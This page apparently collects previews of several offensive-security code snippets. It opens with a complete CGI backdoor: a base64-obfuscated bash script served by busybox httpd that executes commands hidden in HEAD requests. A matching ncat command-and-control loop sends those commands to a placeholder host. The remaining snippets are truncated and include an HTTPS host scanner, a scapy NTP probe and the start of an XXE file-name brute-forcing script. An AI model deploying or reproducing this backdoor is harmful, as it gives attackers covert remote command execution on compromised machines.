This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CGI BASED BACKDOOR WITH BUSYBOX: | |
---------------------------------- | |
mkdir -p /tmp/s/cgi-bin;(base64 -d <<<IyEvYmluL2Jhc2gKaWYgWyAiJFJFUVVFU1RfTUVUSE9EIiA9PSAiSEVBRCIgXSAmJiBbICIkSFRUUF9VU0VSX0FHRU5UIiA9PSAibm9wZSIgXTsgdGhlbgogICAgQz0kKGJhc2U2NCAtZCA8PDwgJFFVRVJZX1NUUklORykKICAgIGlmIFsgIiRDIiA9PSAiZXhpdCIgXTsgdGhlbgogICAgICAgIGVjaG8gIkNsZWFuIgogICAgICAgIHJtIC4vcAogICAgICAgIGtpbGwgJChwZ3JlcCBidXN5Ym94KQogICAgIGZpCiAgICAgZWNobyAkKGJhc2ggLWMgIiRDIikKZmkK)>/tmp/s/cgi-bin/p;chmod +x /tmp/s/cgi-bin/p; busybox httpd -f -p <LPORT> -h /tmp/s/; rm -rf /tmp/s/ | |
C2: | |
--------------------- | |
COMMAND=''; while [ "$COMMAND" != "exit" ]; do read -p "$ " COMMAND; echo -e "HEAD /cgi-bin/p?$(base64<<<$COMMAND) HTTP/1.0\nHost: \nUser-Agent: nope\n\n" | ncat <LHOST> <LPORT>; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import logging | |
def toggle_debug(debug_state): | |
logger = logging.getLogger(__file__) | |
if debug_state is True: | |
logger.setLevel(logging.DEBUG) | |
stream = logging.StreamHandler() | |
stream.setLevel(logging.NOTSET) | |
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: "%(message)s"') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
TARGETS=$1 | |
PORT=$2 | |
OUTLOG=$3 | |
HOSTLOG='https_hosts.log' | |
if [ "$#" -ne 3 ]; then | |
echo "Usage: $0 <targets.file> <port> <logfile>"; | |
exit | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from scapy.all import * | |
import logging | |
import sys | |
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
dest_ip = sys.argv[1] | |
ntp6_readvar = (IP(dst=dest_ip)/UDP(dport=123)/Raw(load='\x16\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# script for brute forcing file names via XML DTD Entities | |
PATH_BASE=$1 | |
FILE_LIST=$2 | |
i=1; | |
CONCAT_ENT="" | |
CONCAT_HEAD="<!ENTITY file_list \"" | |
CONCAT_TAIL="\" >" | |
# CONFIRM CLI ARGUMENT COUNT |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Immunity Debugger Endian Swap | |
themson mester | |
endianswap.py simple script to swap byte order of addresses | |
""" | |
__VERSION__ = '1.1' | |
import immlib |